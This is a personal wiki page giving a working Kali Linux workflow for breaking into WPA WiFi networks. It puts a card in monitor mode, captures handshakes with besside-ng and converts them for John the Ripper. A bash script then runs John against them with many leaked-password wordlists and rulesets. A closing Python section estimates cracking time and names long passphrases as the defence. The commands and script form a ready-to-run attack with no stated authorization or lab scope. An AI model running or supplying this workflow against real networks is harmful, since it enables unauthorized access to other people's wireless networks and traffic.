Kali/Wireless Reboot
From charlesreid1
Revision as of 11:54, 18 August 2016
Reboot
Revisiting some of the old techniques.
Monitor wireless
First is aircrack to monitor wifi networks.
Start by putting the wifi card in monitor mode:
$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up
Now you can use that interface to scan for wireless network activity:
$ airodump-ng -w output_file wlan1
This will output information about wireless network activity to a file.
Obtain handshakes
You can use aircrack to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.
Specify -W for wpa only, and specify your network interface:
$ besside-ng -W wlan1
That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.
Crack handshakes
Once we have the handshakes, use the instructions on the John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw
Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:
<pre>
#!/bin/bash
# Arrays and [[ ]] below are bash features, so this must run under bash, not sh.
#
# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"
cap="wpa.cap"
pwdir="/root/box/08_besside"

# Round 0: no ruleset (plain wordlist pass)
rulesets=("")
#### Round 1
###rulesets=("KoreLogicRulesAppendYears")
#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt
wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work
# Iterate the glob directly instead of parsing `ls` output, so filenames
# with spaces are handled and an empty directory does not break the loop.
shopt -s nullglob
for pwfile in "${pwdir}"/*.johnpw;
do
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** ** * * * ** ****"
    echo "* ** * *** **** *** * ** ** *** * * * *** *"
    echo " * ***** * * * * *** * * * * * *** * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""
    for rules in "${rulesets[@]}";
    do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . . ."
        echo "... ... .. ...... . .. . . . .... .... ."
        echo "... . .. . . . .. .... . . . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""
        for wordlist in "${wordlists[@]}";
        do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"
            # Remember where we started, run john from its own directory
            # (so it finds john.conf and its rules), then come back.
            mypwd="$(pwd)"
            if [[ -z "${rules}" ]] ; then
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
                # actually do it
                cd "${johndir}" || exit 1
                "${johnbin}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}"
                cd "${mypwd}" || exit 1
            else
                # test it out first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules} ${pwfile}"
                # actually do it
                cd "${johndir}" || exit 1
                "${johnbin}" --rules="${rules}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}"
                cd "${mypwd}" || exit 1
            fi
        done
    done
done
</pre>
Settle in, because we'll be here a while.
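Why it takes a while: WPA/WPA2-PSK derives the pairwise master key with PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, for 4096 rounds, so every candidate word costs 4096 HMAC computations. The following Python is an added example (not part of the original page or the John the Ripper project) that derives a PMK, checks it against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), and turns a measured guess rate plus the wordlist-times-ruleset candidate count from the script above into a runtime estimate. The candidate strings, wordlist sizes and rule multipliers in the `__main__` section are constructed for illustration; a long random passphrase pushes this estimate past any practical budget, which is the mitigation.

```python
import hashlib
import time

# Published IEEE 802.11i Annex test vector: passphrase "password", SSID "IEEE".
KNOWN_VECTOR = (
    "password",
    "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)


def derive_pmk(passphrase: str, ssid: str) -> str:
    """WPA/WPA2-PSK PMK: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds, 32 bytes."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    return pmk.hex()


def measure_guess_rate(ssid: str, samples: int = 200) -> float:
    """Single-threaded guesses per second for pure-Python PBKDF2.

    Candidates are constructed placeholder strings; only the cost per guess matters.
    """
    candidates = [f"candidate{i:06d}" for i in range(samples)]
    start = time.perf_counter()
    for candidate in candidates:
        derive_pmk(candidate, ssid)
    elapsed = time.perf_counter() - start
    return samples / elapsed


def candidate_count(wordlist_sizes, rule_multipliers) -> int:
    """Total guesses when every wordlist is run once per ruleset (as the bash loop does).

    A plain pass has multiplier 1; a ruleset that, say, appends N different years
    expands each word into N candidates. Multipliers here are caller-supplied estimates.
    """
    return sum(wordlist_sizes) * sum(rule_multipliers)


def estimate_seconds(num_candidates: int, guesses_per_second: float) -> float:
    """Wall-clock seconds to exhaust num_candidates at the given rate."""
    if guesses_per_second <= 0:
        raise ValueError("guess rate must be positive")
    return num_candidates / guesses_per_second


if __name__ == "__main__":
    passphrase, ssid, expected = KNOWN_VECTOR
    assert derive_pmk(passphrase, ssid) == expected
    print("PMK test vector OK")

    rate = measure_guess_rate(ssid)
    print(f"pure-Python rate: {rate:,.0f} guesses/s")

    # Constructed sizes: two small lists plus a rockyou-sized one, run with a plain
    # pass (x1) and a hypothetical append-year ruleset (x100) as in Round 2.
    total = candidate_count([184_000, 1_400_000, 14_300_000], [1, 100])
    seconds = estimate_seconds(total, rate)
    print(f"{total:,} candidates -> {seconds / 86400:,.1f} days at this rate")
```

John and hashcat are far faster than this loop, but the shape of the estimate is the same: candidates grow multiplicatively with rulesets, while cost per candidate is fixed by the 4096-round PBKDF2, which is what makes a long, non-dictionary passphrase the effective defence.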
Flags
Category:Security · Category:Wireless · Category:Passwords